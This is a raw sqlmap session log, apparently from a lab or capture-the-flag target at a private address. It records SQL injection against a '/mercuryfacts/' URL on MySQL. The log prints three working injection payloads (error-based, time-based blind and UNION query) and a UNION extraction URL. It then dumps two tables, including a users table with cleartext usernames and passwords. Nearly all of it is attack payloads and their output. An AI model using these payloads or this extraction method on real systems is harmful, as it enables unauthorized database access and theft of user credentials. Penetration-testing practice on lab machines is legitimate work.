        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.11#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:52:44 /2022-12-29/

[17:52:45] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[17:52:45] [INFO] resuming back-end DBMS 'mysql' 
[17:52:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: http://192.168.0.128:8080/mercuryfacts/GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(3442=3442,1))),0x7171707171),3442)

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://192.168.0.128:8080/mercuryfacts/(CASE WHEN (3266=3266) THEN SLEEP(5) ELSE 3266 END)

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: http://192.168.0.128:8080/mercuryfacts/-3579 UNION ALL SELECT CONCAT(0x7176626a71,0x4772674d6b416679566a66774a6555684a67704c7955436b744f7579674568586c485279774f4d4f,0x7171707171)#
---
[17:52:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[17:52:45] [INFO] fetching tables for database: 'mercury'
[17:52:45] [INFO] fetching columns for table 'facts' in database 'mercury'
[17:52:45] [INFO] fetching entries for table 'facts' in database 'mercury'
got a 301 redirect to 'http://192.168.0.128:8080/mercuryfacts/-9409%20UNION%20ALL%20SELECT%20CONCAT(0x7176626a71,JSON_ARRAYAGG(CONCAT_WS(0x73796d706274,fact,id)),0x7171707171)%20FROM%20mercury.facts%23/'. Do you want to follow? [Y/n] Y
[17:52:45] [WARNING] reflective value(s) found and filtering out
[17:52:45] [INFO] resumed: 'Mercury does not have any moons or rings.','1'
[17:52:45] [INFO] resumed: 'Mercury is the smallest planet.','2'
[17:52:45] [INFO] resumed: 'Mercury is the closest planet to the Sun.','3'
[17:52:45] [INFO] resumed: 'Your weight on Mercury would be 38% of your weight on Earth.','4'
[17:52:45] [INFO] resumed: 'A day on the surface of Mercury lasts 176 Earth days.','5'
[17:52:45] [INFO] resumed: 'A year on Mercury takes 88 Earth days.','6'
[17:52:45] [INFO] resumed: 'It's not known who discovered Mercury.','7'
[17:52:45] [INFO] resumed: 'A year on Mercury is just 88 days long.','8'
Database: mercury
Table: facts
[8 entries]
+----+--------------------------------------------------------------+
| id | fact                                                         |
+----+--------------------------------------------------------------+
| 1  | Mercury does not have any moons or rings.                    |
| 2  | Mercury is the smallest planet.                              |
| 3  | Mercury is the closest planet to the Sun.                    |
| 4  | Your weight on Mercury would be 38% of your weight on Earth. |
| 5  | A day on the surface of Mercury lasts 176 Earth days.        |
| 6  | A year on Mercury takes 88 Earth days.                       |
| 7  | It's not known who discovered Mercury.                       |
| 8  | A year on Mercury is just 88 days long.                      |
+----+--------------------------------------------------------------+

[17:52:45] [INFO] table 'mercury.facts' dumped to CSV file '/home/atenea/.local/share/sqlmap/output/192.168.0.128/dump/mercury/facts.csv'
[17:52:45] [INFO] fetching columns for table 'users' in database 'mercury'
[17:52:45] [INFO] fetching entries for table 'users' in database 'mercury'
Database: mercury
Table: users
[4 entries]
+----+-------------------------------+-----------+
| id | password                      | username  |
+----+-------------------------------+-----------+
| 1  | johnny1987                    | john      |
| 2  | lovemykids111                 | laura     |
| 3  | lovemybeer111                 | sam       |
| 4  | mercuryisthesizeof0.056Earths | webmaster |
+----+-------------------------------+-----------+

[17:52:45] [INFO] table 'mercury.users' dumped to CSV file '/home/atenea/.local/share/sqlmap/output/192.168.0.128/dump/mercury/users.csv'
[17:52:45] [INFO] fetched data logged to text files under '/home/atenea/.local/share/sqlmap/output/192.168.0.128'

[*] ending @ 17:52:45 /2022-12-29/

